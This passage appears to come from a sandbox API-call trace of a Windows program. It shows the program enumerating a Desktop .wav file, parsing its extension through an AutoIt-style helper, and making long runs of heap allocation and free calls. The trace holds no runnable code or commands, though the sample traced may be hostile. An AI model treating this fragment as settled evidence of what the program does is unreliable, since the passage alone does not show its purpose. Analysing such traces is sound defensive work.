(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\32u39klehz.wav")) returned 1 [0029.590] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8e0440, ftCreationTime.dwHighDateTime=0x1d5befa, ftLastAccessTime.dwLowDateTime=0x5a88f350, ftLastAccessTime.dwHighDateTime=0x1d5b9ed, ftLastWriteTime.dwLowDateTime=0x1185cf00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14d27, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="32U39klehZ.wav", cAlternateFileName="32U39K~1.WAV")) returned 0 [0029.590] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.591] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.592] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.593] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af7c8 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.593] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0029.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.594] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.595] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.596] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0029.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 